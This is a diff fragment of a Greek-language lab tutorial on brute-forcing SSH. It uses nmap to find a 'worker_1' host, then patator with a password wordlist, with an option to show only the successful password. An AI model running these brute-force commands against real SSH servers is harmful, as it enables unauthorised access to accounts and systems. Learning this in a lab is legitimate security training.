@ -43,12 +43,14 @@ ________________________________________________________________________________
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')**
**worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')**
* Με την ακόλουθη εντολή εκτελείτε η επίθεση.
* Με την ακόλουθη εντολή εκτελείτε η επίθεση, όπου password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό .
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker**
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker**
#emfanizei kai tis apotyximenes prospatheies
#patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'
Εάν δε θέλουμε να εμφανιστούν, όλες οι ανεπιτυχείς προσπάθειες της επίθεσης, αλλά μόνο ο σωστός κωδικός, πρέπει να συμπληρώσουμε ** -x ignore:mesg='Authentication failed.'** και η προηγούμενη εντολή θα εκτελεστεί έτσι:
#emfanizei mono tin epithesi ston kwdiko pou isxuei
**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'**
_____________________________________________________________________________________________
**REFERENCES**
**REFERENCES**
1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae
1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae